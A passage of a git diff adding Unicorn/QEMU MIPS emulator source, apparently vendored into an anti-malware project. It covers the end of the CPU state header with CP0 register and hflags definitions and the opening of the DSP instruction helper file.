CP0TCSt_A 13 +#define CP0TCSt_TKSU 11 +#define CP0TCSt_IXMT 10 +#define CP0TCSt_TASID 0 + int32_t CP0_TCBind; +#define CP0TCBd_CurTC 21 +#define CP0TCBd_TBE 17 +#define CP0TCBd_CurVPE 0 + target_ulong CP0_TCHalt; + target_ulong CP0_TCContext; + target_ulong CP0_TCSchedule; + target_ulong CP0_TCScheFBack; + int32_t CP0_Debug_tcstatus; + target_ulong CP0_UserLocal; + + int32_t msacsr; + +#define MSACSR_FS 24 +#define MSACSR_FS_MASK (1 << MSACSR_FS) +#define MSACSR_NX 18 +#define MSACSR_NX_MASK (1 << MSACSR_NX) +#define MSACSR_CEF 2 +#define MSACSR_CEF_MASK (0xffff << MSACSR_CEF) +#define MSACSR_RM 0 +#define MSACSR_RM_MASK (0x3 << MSACSR_RM) +#define MSACSR_MASK (MSACSR_RM_MASK | MSACSR_CEF_MASK | MSACSR_NX_MASK | \ + MSACSR_FS_MASK) + + float_status msa_fp_status; +}; + +typedef struct CPUMIPSState CPUMIPSState; +struct CPUMIPSState { + TCState active_tc; + CPUMIPSFPUContext active_fpu; + + uint32_t current_tc; + uint32_t current_fpu; + + uint32_t SEGBITS; + uint32_t PABITS; + target_ulong SEGMask; + target_ulong PAMask; + + int32_t msair; +#define MSAIR_ProcID 8 +#define MSAIR_Rev 0 + + int32_t CP0_Index; + /* CP0_MVP* are per MVP registers. */ + int32_t CP0_Random; + int32_t CP0_VPEControl; +#define CP0VPECo_YSI 21 +#define CP0VPECo_GSI 20 +#define CP0VPECo_EXCPT 16 +#define CP0VPECo_TE 15 +#define CP0VPECo_TargTC 0 + int32_t CP0_VPEConf0; +#define CP0VPEC0_M 31 +#define CP0VPEC0_XTC 21 +#define CP0VPEC0_TCS 19 +#define CP0VPEC0_SCS 18 +#define CP0VPEC0_DSC 17 +#define CP0VPEC0_ICS 16 +#define CP0VPEC0_MVP 1 +#define CP0VPEC0_VPA 0 + int32_t CP0_VPEConf1; +#define CP0VPEC1_NCX 20 +#define CP0VPEC1_NCP2 10 +#define CP0VPEC1_NCP1 0 + target_ulong CP0_YQMask; + target_ulong CP0_VPESchedule; + target_ulong CP0_VPEScheFBack; + int32_t CP0_VPEOpt; +#define CP0VPEOpt_IWX7 15 +#define CP0VPEOpt_IWX6 14 +#define CP0VPEOpt_IWX5 13 +#define CP0VPEOpt_IWX4 12 +#define CP0VPEOpt_IWX3 11 +#define CP0VPEOpt_IWX2 10 +#define CP0VPEOpt_IWX1 9 +#define CP0VPEOpt_IWX0 8 +#define CP0VPEOpt_DWX7 7 +#define CP0VPEOpt_DWX6 6 +#define CP0VPEOpt_DWX5 5 +#define CP0VPEOpt_DWX4 4 +#define CP0VPEOpt_DWX3 3 +#define CP0VPEOpt_DWX2 2 +#define CP0VPEOpt_DWX1 1 +#define CP0VPEOpt_DWX0 0 + target_ulong CP0_EntryLo0; + target_ulong CP0_EntryLo1; +#if defined(TARGET_MIPS64) +# define CP0EnLo_RI 63 +# define CP0EnLo_XI 62 +#else +# define CP0EnLo_RI 31 +# define CP0EnLo_XI 30 +#endif + target_ulong CP0_Context; + target_ulong CP0_KScratch[MIPS_KSCRATCH_NUM]; + int32_t CP0_PageMask; + int32_t CP0_PageGrain_rw_bitmask; + int32_t CP0_PageGrain; +#define CP0PG_RIE 31 +#define CP0PG_XIE 30 +#define CP0PG_IEC 27 + int32_t CP0_Wired; + int32_t CP0_SRSConf0_rw_bitmask; + int32_t CP0_SRSConf0; +#define CP0SRSC0_M 31 +#define CP0SRSC0_SRS3 20 +#define CP0SRSC0_SRS2 10 +#define CP0SRSC0_SRS1 0 + int32_t CP0_SRSConf1_rw_bitmask; + int32_t CP0_SRSConf1; +#define CP0SRSC1_M 31 +#define CP0SRSC1_SRS6 20 +#define CP0SRSC1_SRS5 10 +#define CP0SRSC1_SRS4 0 + int32_t CP0_SRSConf2_rw_bitmask; + int32_t CP0_SRSConf2; +#define CP0SRSC2_M 31 +#define CP0SRSC2_SRS9 20 +#define CP0SRSC2_SRS8 10 +#define CP0SRSC2_SRS7 0 + int32_t CP0_SRSConf3_rw_bitmask; + int32_t CP0_SRSConf3; +#define CP0SRSC3_M 31 +#define CP0SRSC3_SRS12 20 +#define CP0SRSC3_SRS11 10 +#define CP0SRSC3_SRS10 0 + int32_t CP0_SRSConf4_rw_bitmask; + int32_t CP0_SRSConf4; +#define CP0SRSC4_SRS15 20 +#define CP0SRSC4_SRS14 10 +#define CP0SRSC4_SRS13 0 + int32_t CP0_HWREna; + target_ulong CP0_BadVAddr; + uint32_t CP0_BadInstr; + uint32_t CP0_BadInstrP; + int32_t CP0_Count; + target_ulong CP0_EntryHi; +#define CP0EnHi_EHINV 10 + int32_t CP0_Compare; + int32_t CP0_Status; +#define CP0St_CU3 31 +#define CP0St_CU2 30 +#define CP0St_CU1 29 +#define CP0St_CU0 28 +#define CP0St_RP 27 +#define CP0St_FR 26 +#define CP0St_RE 25 +#define CP0St_MX 24 +#define CP0St_PX 23 +#define CP0St_BEV 22 +#define CP0St_TS 21 +#define CP0St_SR 20 +#define CP0St_NMI 19 +#define CP0St_IM 8 +#define CP0St_KX 7 +#define CP0St_SX 6 +#define CP0St_UX 5 +#define CP0St_KSU 3 +#define CP0St_ERL 2 +#define CP0St_EXL 1 +#define CP0St_IE 0 + int32_t CP0_IntCtl; +#define CP0IntCtl_IPTI 29 +#define CP0IntCtl_IPPC1 26 +#define CP0IntCtl_VS 5 + int32_t CP0_SRSCtl; +#define CP0SRSCtl_HSS 26 +#define CP0SRSCtl_EICSS 18 +#define CP0SRSCtl_ESS 12 +#define CP0SRSCtl_PSS 6 +#define CP0SRSCtl_CSS 0 + int32_t CP0_SRSMap; +#define CP0SRSMap_SSV7 28 +#define CP0SRSMap_SSV6 24 +#define CP0SRSMap_SSV5 20 +#define CP0SRSMap_SSV4 16 +#define CP0SRSMap_SSV3 12 +#define CP0SRSMap_SSV2 8 +#define CP0SRSMap_SSV1 4 +#define CP0SRSMap_SSV0 0 + int32_t CP0_Cause; +#define CP0Ca_BD 31 +#define CP0Ca_TI 30 +#define CP0Ca_CE 28 +#define CP0Ca_DC 27 +#define CP0Ca_PCI 26 +#define CP0Ca_IV 23 +#define CP0Ca_WP 22 +#define CP0Ca_IP 8 +#define CP0Ca_IP_mask 0x0000FF00 +#define CP0Ca_EC 2 + target_ulong CP0_EPC; + int32_t CP0_PRid; + int32_t CP0_EBase; + int32_t CP0_Config0; +#define CP0C0_M 31 +#define CP0C0_K23 28 +#define CP0C0_KU 25 +#define CP0C0_MDU 20 +#define CP0C0_MM 17 +#define CP0C0_BM 16 +#define CP0C0_BE 15 +#define CP0C0_AT 13 +#define CP0C0_AR 10 +#define CP0C0_MT 7 +#define CP0C0_VI 3 +#define CP0C0_K0 0 + int32_t CP0_Config1; +#define CP0C1_M 31 +#define CP0C1_MMU 25 +#define CP0C1_IS 22 +#define CP0C1_IL 19 +#define CP0C1_IA 16 +#define CP0C1_DS 13 +#define CP0C1_DL 10 +#define CP0C1_DA 7 +#define CP0C1_C2 6 +#define CP0C1_MD 5 +#define CP0C1_PC 4 +#define CP0C1_WR 3 +#define CP0C1_CA 2 +#define CP0C1_EP 1 +#define CP0C1_FP 0 + int32_t CP0_Config2; +#define CP0C2_M 31 +#define CP0C2_TU 28 +#define CP0C2_TS 24 +#define CP0C2_TL 20 +#define CP0C2_TA 16 +#define CP0C2_SU 12 +#define CP0C2_SS 8 +#define CP0C2_SL 4 +#define CP0C2_SA 0 + int32_t CP0_Config3; +#define CP0C3_M 31 +#define CP0C3_BPG 30 +#define CP0C3_CMCGR 29 +#define CP0C3_MSAP 28 +#define CP0C3_BP 27 +#define CP0C3_BI 26 +#define CP0C3_IPLW 21 +#define CP0C3_MMAR 18 +#define CP0C3_MCU 17 +#define CP0C3_ISA_ON_EXC 16 +#define CP0C3_ISA 14 +#define CP0C3_ULRI 13 +#define CP0C3_RXI 12 +#define CP0C3_DSP2P 11 +#define CP0C3_DSPP 10 +#define CP0C3_LPA 7 +#define CP0C3_VEIC 6 +#define CP0C3_VInt 5 +#define CP0C3_SP 4 +#define CP0C3_CDMM 3 +#define CP0C3_MT 2 +#define CP0C3_SM 1 +#define CP0C3_TL 0 + uint32_t CP0_Config4; + uint32_t CP0_Config4_rw_bitmask; +#define CP0C4_M 31 +#define CP0C4_IE 29 +#define CP0C4_KScrExist 16 +#define CP0C4_MMUExtDef 14 +#define CP0C4_FTLBPageSize 8 +#define CP0C4_FTLBWays 4 +#define CP0C4_FTLBSets 0 +#define CP0C4_MMUSizeExt 0 + uint32_t CP0_Config5; + uint32_t CP0_Config5_rw_bitmask; +#define CP0C5_M 31 +#define CP0C5_K 30 +#define CP0C5_CV 29 +#define CP0C5_EVA 28 +#define CP0C5_MSAEn 27 +#define CP0C5_SBRI 6 +#define CP0C5_UFR 2 +#define CP0C5_NFExists 0 + int32_t CP0_Config6; + int32_t CP0_Config7; + /* XXX: Maybe make LLAddr per-TC? */ + target_ulong lladdr; + target_ulong llval; + target_ulong llnewval; + target_ulong llreg; + target_ulong CP0_LLAddr_rw_bitmask; + int CP0_LLAddr_shift; + target_ulong CP0_WatchLo[8]; + int32_t CP0_WatchHi[8]; + target_ulong CP0_XContext; + int32_t CP0_Framemask; + int32_t CP0_Debug; +#define CP0DB_DBD 31 +#define CP0DB_DM 30 +#define CP0DB_LSNM 28 +#define CP0DB_Doze 27 +#define CP0DB_Halt 26 +#define CP0DB_CNT 25 +#define CP0DB_IBEP 24 +#define CP0DB_DBEP 21 +#define CP0DB_IEXI 20 +#define CP0DB_VER 15 +#define CP0DB_DEC 10 +#define CP0DB_SSt 8 +#define CP0DB_DINT 5 +#define CP0DB_DIB 4 +#define CP0DB_DDBS 3 +#define CP0DB_DDBL 2 +#define CP0DB_DBp 1 +#define CP0DB_DSS 0 + target_ulong CP0_DEPC; + int32_t CP0_Performance0; + int32_t CP0_TagLo; + int32_t CP0_DataLo; + int32_t CP0_TagHi; + int32_t CP0_DataHi; + target_ulong CP0_ErrorEPC; + int32_t CP0_DESAVE; + /* We waste some space so we can handle shadow registers like TCs. */ + TCState tcs[MIPS_SHADOW_SET_MAX]; + CPUMIPSFPUContext fpus[MIPS_FPU_MAX]; + /* QEMU */ + int error_code; +#define EXCP_TLB_NOMATCH 0x1 +#define EXCP_INST_NOTAVAIL 0x2 /* No valid instruction word for BadInstr */ + uint32_t hflags; /* CPU State */ + /* TMASK defines different execution modes */ +#define MIPS_HFLAG_TMASK 0x15807FF +#define MIPS_HFLAG_MODE 0x00007 /* execution modes */ + /* The KSU flags must be the lowest bits in hflags. The flag order + must be the same as defined for CP0 Status. This allows to use + the bits as the value of mmu_idx. */ +#define MIPS_HFLAG_KSU 0x00003 /* kernel/supervisor/user mode mask */ +#define MIPS_HFLAG_UM 0x00002 /* user mode flag */ +#define MIPS_HFLAG_SM 0x00001 /* supervisor mode flag */ +#define MIPS_HFLAG_KM 0x00000 /* kernel mode flag */ +#define MIPS_HFLAG_DM 0x00004 /* Debug mode */ +#define MIPS_HFLAG_64 0x00008 /* 64-bit instructions enabled */ +#define MIPS_HFLAG_CP0 0x00010 /* CP0 enabled */ +#define MIPS_HFLAG_FPU 0x00020 /* FPU enabled */ +#define MIPS_HFLAG_F64 0x00040 /* 64-bit FPU enabled */ + /* True if the MIPS IV COP1X instructions can be used. This also + controls the non-COP1X instructions RECIP.S, RECIP.D, RSQRT.S + and RSQRT.D. */ +#define MIPS_HFLAG_COP1X 0x00080 /* COP1X instructions enabled */ +#define MIPS_HFLAG_RE 0x00100 /* Reversed endianness */ +#define MIPS_HFLAG_AWRAP 0x00200 /* 32-bit compatibility address wrapping */ +#define MIPS_HFLAG_M16 0x00400 /* MIPS16 mode flag */ +#define MIPS_HFLAG_M16_SHIFT 10 + /* If translation is interrupted between the branch instruction and + * the delay slot, record what type of branch it is so that we can + * resume translation properly. It might be possible to reduce + * this from three bits to two. */ +#define MIPS_HFLAG_BMASK_BASE 0x803800 +#define MIPS_HFLAG_B 0x00800 /* Unconditional branch */ +#define MIPS_HFLAG_BC 0x01000 /* Conditional branch */ +#define MIPS_HFLAG_BL 0x01800 /* Likely branch */ +#define MIPS_HFLAG_BR 0x02000 /* branch to register (can't link TB) */ + /* Extra flags about the current pending branch. */ +#define MIPS_HFLAG_BMASK_EXT 0x7C000 +#define MIPS_HFLAG_B16 0x04000 /* branch instruction was 16 bits */ +#define MIPS_HFLAG_BDS16 0x08000 /* branch requires 16-bit delay slot */ +#define MIPS_HFLAG_BDS32 0x10000 /* branch requires 32-bit delay slot */ +#define MIPS_HFLAG_BDS_STRICT 0x20000 /* Strict delay slot size */ +#define MIPS_HFLAG_BX 0x40000 /* branch exchanges execution mode */ +#define MIPS_HFLAG_BMASK (MIPS_HFLAG_BMASK_BASE | MIPS_HFLAG_BMASK_EXT) + /* MIPS DSP resources access. */ +#define MIPS_HFLAG_DSP 0x080000 /* Enable access to MIPS DSP resources. */ +#define MIPS_HFLAG_DSPR2 0x100000 /* Enable access to MIPS DSPR2 resources. */ + /* Extra flag about HWREna register. */ +#define MIPS_HFLAG_HWRENA_ULR 0x200000 /* ULR bit from HWREna is set. */ +#define MIPS_HFLAG_SBRI 0x400000 /* R6 SDBBP causes RI excpt. in user mode */ +#define MIPS_HFLAG_FBNSLOT 0x800000 /* Forbidden slot */ +#define MIPS_HFLAG_MSA 0x1000000 + target_ulong btarget; /* Jump / branch target */ + target_ulong bcond; /* Branch condition (if needed) */ + + int SYNCI_Step; /* Address step size for SYNCI */ + int CCRes; /* Cycle count resolution/divisor */ + uint32_t CP0_Status_rw_bitmask; /* Read/write bits in CP0_Status */ + uint32_t CP0_TCStatus_rw_bitmask; /* Read/write bits in CP0_TCStatus */ + int insn_flags; /* Supported instruction set */ + + CPU_COMMON + + /* Fields from here on are preserved across CPU reset. */ + CPUMIPSMVPContext *mvp; +#if !defined(CONFIG_USER_ONLY) + CPUMIPSTLBContext *tlb; +#endif + + const mips_def_t *cpu_model; + //void *irq[8]; + //QEMUTimer *timer; /* Internal timer */ + + // Unicorn engine + struct uc_struct *uc; +}; + +#include "cpu-qom.h" + +#if !defined(CONFIG_USER_ONLY) +int no_mmu_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type); +int fixed_mmu_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type); +int r4k_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type); +void r4k_helper_tlbwi(CPUMIPSState *env); +void r4k_helper_tlbwr(CPUMIPSState *env); +void r4k_helper_tlbp(CPUMIPSState *env); +void r4k_helper_tlbr(CPUMIPSState *env); +void r4k_helper_tlbinv(CPUMIPSState *env); +void r4k_helper_tlbinvf(CPUMIPSState *env); + +void mips_cpu_unassigned_access(CPUState *cpu, hwaddr addr, + bool is_write, bool is_exec, int unused, + unsigned size); +#endif + +void mips_cpu_list (FILE *f, fprintf_function cpu_fprintf); + +#define cpu_exec cpu_mips_exec +#define cpu_gen_code cpu_mips_gen_code +#define cpu_signal_handler cpu_mips_signal_handler +#define cpu_list mips_cpu_list + +extern void cpu_wrdsp(uint32_t rs, uint32_t mask_num, CPUMIPSState *env); +extern uint32_t cpu_rddsp(uint32_t mask_num, CPUMIPSState *env); + +#define CPU_SAVE_VERSION 5 + +/* MMU modes definitions. We carefully match the indices with our + hflags layout. */ +#define MMU_MODE0_SUFFIX _kernel +#define MMU_MODE1_SUFFIX _super +#define MMU_MODE2_SUFFIX _user +#define MMU_USER_IDX 2 +static inline int cpu_mmu_index (CPUMIPSState *env) +{ + return env->hflags & MIPS_HFLAG_KSU; +} + +static inline int cpu_mips_hw_interrupts_pending(CPUMIPSState *env) +{ + int32_t pending; + int32_t status; + int r; + + if (!(env->CP0_Status & (1 << CP0St_IE)) || + (env->CP0_Status & (1 << CP0St_EXL)) || + (env->CP0_Status & (1 << CP0St_ERL)) || + /* Note that the TCStatus IXMT field is initialized to zero, + and only MT capable cores can set it to one. So we don't + need to check for MT capabilities here. */ + (env->active_tc.CP0_TCStatus & (1 << CP0TCSt_IXMT)) || + (env->hflags & MIPS_HFLAG_DM)) { + /* Interrupts are disabled */ + return 0; + } + + pending = env->CP0_Cause & CP0Ca_IP_mask; + status = env->CP0_Status & CP0Ca_IP_mask; + + if (env->CP0_Config3 & (1 << CP0C3_VEIC)) { + /* A MIPS configured with a vectorizing external interrupt controller + will feed a vector into the Cause pending lines. The core treats + the status lines as a vector level, not as indiviual masks. */ + r = pending > status; + } else { + /* A MIPS configured with compatibility or VInt (Vectored Interrupts) + treats the pending lines as individual interrupt lines, the status + lines are individual masks. */ + r = pending & status; + } + return r; +} + +#include "exec/cpu-all.h" + +/* Memory access type : + * may be needed for precise access rights control and precise exceptions. + */ +enum { + /* 1 bit to define user level / supervisor access */ + ACCESS_USER = 0x00, + ACCESS_SUPER = 0x01, + /* 1 bit to indicate direction */ + ACCESS_STORE = 0x02, + /* Type of instruction that generated the access */ + ACCESS_CODE = 0x10, /* Code fetch access */ + ACCESS_INT = 0x20, /* Integer load/store access */ + ACCESS_FLOAT = 0x30, /* floating point load/store access */ +}; + +/* Exceptions */ +enum { + EXCP_NONE = -1, + EXCP_RESET = 0, + EXCP_SRESET, + EXCP_DSS, + EXCP_DINT, + EXCP_DDBL, + EXCP_DDBS, + EXCP_NMI, + EXCP_MCHECK, + EXCP_EXT_INTERRUPT, /* 8 */ + EXCP_DFWATCH, + EXCP_DIB, + EXCP_IWATCH, + EXCP_AdEL, + EXCP_AdES, + EXCP_TLBF, + EXCP_IBE, + EXCP_DBp, /* 16 */ + EXCP_SYSCALL, + EXCP_BREAK, + EXCP_CpU, + EXCP_RI, + EXCP_OVERFLOW, + EXCP_TRAP, + EXCP_FPE, + EXCP_DWATCH, /* 24 */ + EXCP_LTLBL, + EXCP_TLBL, + EXCP_TLBS, + EXCP_DBE, + EXCP_THREAD, + EXCP_MDMX, + EXCP_C2E, + EXCP_CACHE, /* 32 */ + EXCP_DSPDIS, + EXCP_MSADIS, + EXCP_MSAFPE, + EXCP_TLBXI, + EXCP_TLBRI, + + EXCP_LAST = EXCP_TLBRI, +}; +/* Dummy exception for conditional stores. */ +#define EXCP_SC 0x100 + +/* + * This is an interrnally generated WAKE request line. + * It is driven by the CPU itself. Raised when the MT + * block wants to wake a VPE from an inactive state and + * cleared when VPE goes from active to inactive. + */ +#define CPU_INTERRUPT_WAKE CPU_INTERRUPT_TGT_INT_0 + +int cpu_mips_exec(struct uc_struct *uc, CPUMIPSState *s); +void mips_tcg_init(struct uc_struct *uc); +MIPSCPU *cpu_mips_init(struct uc_struct *uc, const char *cpu_model); +int cpu_mips_signal_handler(int host_signum, void *pinfo, void *puc); + +/* TODO QOM'ify CPU reset and remove */ +void cpu_state_reset(CPUMIPSState *s); + +/* mips_timer.c */ +uint32_t cpu_mips_get_random (CPUMIPSState *env); +uint32_t cpu_mips_get_count (CPUMIPSState *env); +void cpu_mips_store_count (CPUMIPSState *env, uint32_t value); +void cpu_mips_store_compare (CPUMIPSState *env, uint32_t value); +void cpu_mips_start_count(CPUMIPSState *env); +void cpu_mips_stop_count(CPUMIPSState *env); + +/* mips_int.c */ +void cpu_mips_soft_irq(CPUMIPSState *env, int irq, int level); + +/* helper.c */ +int mips_cpu_handle_mmu_fault(CPUState *cpu, vaddr address, int rw, + int mmu_idx); +#if !defined(CONFIG_USER_ONLY) +void r4k_invalidate_tlb (CPUMIPSState *env, int idx, int use_extra); +hwaddr cpu_mips_translate_address (CPUMIPSState *env, target_ulong address, + int rw); +#endif +target_ulong exception_resume_pc (CPUMIPSState *env); + +/* op_helper.c */ +extern unsigned int ieee_rm[]; +int ieee_ex_to_mips(int xcpt); + +static inline void cpu_get_tb_cpu_state(CPUMIPSState *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + *pc = env->active_tc.PC; + *cs_base = 0; + *flags = env->hflags & (MIPS_HFLAG_TMASK | MIPS_HFLAG_BMASK | + MIPS_HFLAG_HWRENA_ULR); +} + +static inline int mips_vpe_active(CPUMIPSState *env) +{ + int active = 1; + + /* Check that the VPE is enabled. */ + if (!(env->mvp->CP0_MVPControl & (1 << CP0MVPCo_EVP))) { + active = 0; + } + /* Check that the VPE is activated. */ + if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA))) { + active = 0; + } + + /* Now verify that there are active thread contexts in the VPE. + + This assumes the CPU model will internally reschedule threads + if the active one goes to sleep. If there are no threads available + the active one will be in a sleeping state, and we can turn off + the entire VPE. */ + if (!(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_A))) { + /* TC is not activated. */ + active = 0; + } + if (env->active_tc.CP0_TCHalt & 1) { + /* TC is in halt state. */ + active = 0; + } + + return active; +} + +#include "exec/exec-all.h" + +static inline void compute_hflags(CPUMIPSState *env) +{ + env->hflags &= ~(MIPS_HFLAG_COP1X | MIPS_HFLAG_64 | MIPS_HFLAG_CP0 | + MIPS_HFLAG_F64 | MIPS_HFLAG_FPU | MIPS_HFLAG_KSU | + MIPS_HFLAG_AWRAP | MIPS_HFLAG_DSP | MIPS_HFLAG_DSPR2 | + MIPS_HFLAG_SBRI | MIPS_HFLAG_MSA); + if (!(env->CP0_Status & (1 << CP0St_EXL)) && + !(env->CP0_Status & (1 << CP0St_ERL)) && + !(env->hflags & MIPS_HFLAG_DM)) { + env->hflags |= (env->CP0_Status >> CP0St_KSU) & MIPS_HFLAG_KSU; + } +#if defined(TARGET_MIPS64) + if (((env->hflags & MIPS_HFLAG_KSU) != MIPS_HFLAG_UM) || + (env->CP0_Status & (1 << CP0St_PX)) || + (env->CP0_Status & (1 << CP0St_UX))) { + env->hflags |= MIPS_HFLAG_64; + } + + if (((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_UM) && + !(env->CP0_Status & (1 << CP0St_UX))) { + env->hflags |= MIPS_HFLAG_AWRAP; + } else if (env->insn_flags & ISA_MIPS32R6) { + /* Address wrapping for Supervisor and Kernel is specified in R6 */ + if ((((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_SM) && + !(env->CP0_Status & (1 << CP0St_SX))) || + (((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_KM) && + !(env->CP0_Status & (1 << CP0St_KX)))) { + env->hflags |= MIPS_HFLAG_AWRAP; + } + } +#endif + if (((env->CP0_Status & (1 << CP0St_CU0)) && + !(env->insn_flags & ISA_MIPS32R6)) || + !(env->hflags & MIPS_HFLAG_KSU)) { + env->hflags |= MIPS_HFLAG_CP0; + } + if (env->CP0_Status & (1 << CP0St_CU1)) { + env->hflags |= MIPS_HFLAG_FPU; + } + if (env->CP0_Status & (1 << CP0St_FR)) { + env->hflags |= MIPS_HFLAG_F64; + } + if (((env->hflags & MIPS_HFLAG_KSU) != MIPS_HFLAG_KM) && + (env->CP0_Config5 & (1 << CP0C5_SBRI))) { + env->hflags |= MIPS_HFLAG_SBRI; + } + if (env->insn_flags & ASE_DSPR2) { + /* Enables access MIPS DSP resources, now our cpu is DSP ASER2, + so enable to access DSPR2 resources. */ + if (env->CP0_Status & (1 << CP0St_MX)) { + env->hflags |= MIPS_HFLAG_DSP | MIPS_HFLAG_DSPR2; + } + + } else if (env->insn_flags & ASE_DSP) { + /* Enables access MIPS DSP resources, now our cpu is DSP ASE, + so enable to access DSP resources. */ + if (env->CP0_Status & (1 << CP0St_MX)) { + env->hflags |= MIPS_HFLAG_DSP; + } + + } + if (env->insn_flags & ISA_MIPS32R2) { + if (env->active_fpu.fcr0 & (1 << FCR0_F64)) { + env->hflags |= MIPS_HFLAG_COP1X; + } + } else if (env->insn_flags & ISA_MIPS32) { + if (env->hflags & MIPS_HFLAG_64) { + env->hflags |= MIPS_HFLAG_COP1X; + } + } else if (env->insn_flags & ISA_MIPS4) { + /* All supported MIPS IV CPUs use the XX (CU3) to enable + and disable the MIPS IV extensions to the MIPS III ISA. + Some other MIPS IV CPUs ignore the bit, so the check here + would be too restrictive for them. */ + if (env->CP0_Status & (1U << CP0St_CU3)) { + env->hflags |= MIPS_HFLAG_COP1X; + } + } + if (env->insn_flags & ASE_MSA) { + if (env->CP0_Config5 & (1 << CP0C5_MSAEn)) { + env->hflags |= MIPS_HFLAG_MSA; + } + } +} + +#endif /* !defined (__MIPS_CPU_H__) */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/dsp_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/dsp_helper.c new file mode 100644 index 0000000..46528de --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/dsp_helper.c @@ -0,0 +1,3761 @@ +/* + * MIPS ASE DSP Instruction emulation helpers for QEMU. + * + * Copyright (c) 2012 Jia Liu + * Dongxue Zhang + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "qemu/bitops.h" + +/* As the byte ordering doesn't matter, i.e. all columns are treated + identically, these unions can be used directly. */ +typedef union { + uint8_t ub[4]; + int8_t sb[4]; + uint16_t uh[2]; + int16_t sh[2]; + uint32_t uw[1]; + int32_t sw[1]; +} DSP32Value; + +typedef union { + uint8_t ub[8]; + int8_t sb[8]; + uint16_t uh[4]; + int16_t sh[4]; + uint32_t uw[2]; + int32_t sw[2]; + uint64_t ul[1]; + int64_t sl[1]; +} DSP64Value; + +/*** MIPS DSP internal functions begin ***/ +#define MIPSDSP_ABS(x) (((x) >= 0) ? x : -x) +#define MIPSDSP_OVERFLOW_ADD(a, b, c, d) (~(a ^ b) & (a ^ c) & d) +#define MIPSDSP_OVERFLOW_SUB(a, b, c, d) ((a ^ b) & (a ^ c) & d) + +static inline void set_DSPControl_overflow_flag(uint32_t flag, int position, + CPUMIPSState *env) +{ + env->active_tc.DSPControl |= (target_ulong)flag << position; +} + +static inline void set_DSPControl_carryflag(bool flag, CPUMIPSState *env) +{ + env->active_tc.DSPControl &= ~(1 << 13); + env->active_tc.DSPControl |= flag << 13; +} + +static inline uint32_t get_DSPControl_carryflag(CPUMIPSState *env) +{ + return (env->active_tc.DSPControl >> 13) & 0x01; +} + +static inline void set_DSPControl_24(uint32_t flag, int len, CPUMIPSState *env) +{ + uint32_t filter; + + filter = ((0x01 << len) - 1) << 24; + filter = ~filter; + + env->active_tc.DSPControl &= filter; + env->active_tc.DSPControl |= (target_ulong)flag << 24; +} + +static inline void set_DSPControl_pos(uint32_t pos, CPUMIPSState *env) +{ + target_ulong dspc; + + dspc = env->active_tc.DSPControl; +#ifndef TARGET_MIPS64 + dspc = dspc & 0xFFFFFFC0; + dspc |= (pos & 0x3F); +#else + dspc = dspc & 0xFFFFFF80; + dspc |= (pos & 0x7F); +#endif + env->active_tc.DSPControl = dspc; +} + +static inline uint32_t get_DSPControl_pos(CPUMIPSState *env) +{ + target_ulong dspc; + uint32_t pos; + + dspc = env->active_tc.DSPControl; + +#ifndef TARGET_MIPS64 + pos = dspc & 0x3F; +#else + pos = dspc & 0x7F; +#endif + + return pos; +} + +static inline void set_DSPControl_efi(uint32_t flag, CPUMIPSState *env) +{ + env->active_tc.DSPControl &= 0xFFFFBFFF; + env->active_tc.DSPControl |= (target_ulong)flag << 14; +} + +#define DO_MIPS_SAT_ABS(size) \ +static inline int##size##_t mipsdsp_sat_abs##size(int##size##_t a, \ + CPUMIPSState *env) \ +{ \ + if (a == INT##size##_MIN) { \ + set_DSPControl_overflow_flag(1, 20, env); \ + return INT##size##_MAX; \ + } else { \ + return MIPSDSP_ABS(a); \ + } \ +} +DO_MIPS_SAT_ABS(8) +DO_MIPS_SAT_ABS(16) +DO_MIPS_SAT_ABS(32) +#undef DO_MIPS_SAT_ABS + +/* get sum value */ +static inline int16_t mipsdsp_add_i16(int16_t a, int16_t b, CPUMIPSState *env) +{ + int16_t tempI; + + tempI = a + b; + + if (MIPSDSP_OVERFLOW_ADD(a, b, tempI, 0x8000)) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return tempI; +} + +static inline int16_t mipsdsp_sat_add_i16(int16_t a, int16_t b, + CPUMIPSState *env) +{ + int16_t tempS; + + tempS = a + b; + + if (MIPSDSP_OVERFLOW_ADD(a, b, tempS, 0x8000)) { + if (a > 0) { + tempS = 0x7FFF; + } else { + tempS = 0x8000; + } + set_DSPControl_overflow_flag(1, 20, env); + } + + return tempS; +} + +static inline int32_t mipsdsp_sat_add_i32(int32_t a, int32_t b, + CPUMIPSState *env) +{ + int32_t tempI; + + tempI = a + b; + + if (MIPSDSP_OVERFLOW_ADD(a, b, tempI, 0x80000000)) { + if (a > 0) { + tempI = 0x7FFFFFFF; + } else { + tempI = 0x80000000; + } + set_DSPControl_overflow_flag(1, 20, env); + } + + return tempI; +} + +static inline uint8_t mipsdsp_add_u8(uint8_t a, uint8_t b, CPUMIPSState *env) +{ + uint16_t temp; + + temp = (uint16_t)a + (uint16_t)b; + + if (temp & 0x0100) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0xFF; +} + +static inline uint16_t mipsdsp_add_u16(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint32_t temp; + + temp = (uint32_t)a + (uint32_t)b; + + if (temp & 0x00010000) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0xFFFF; +} + +static 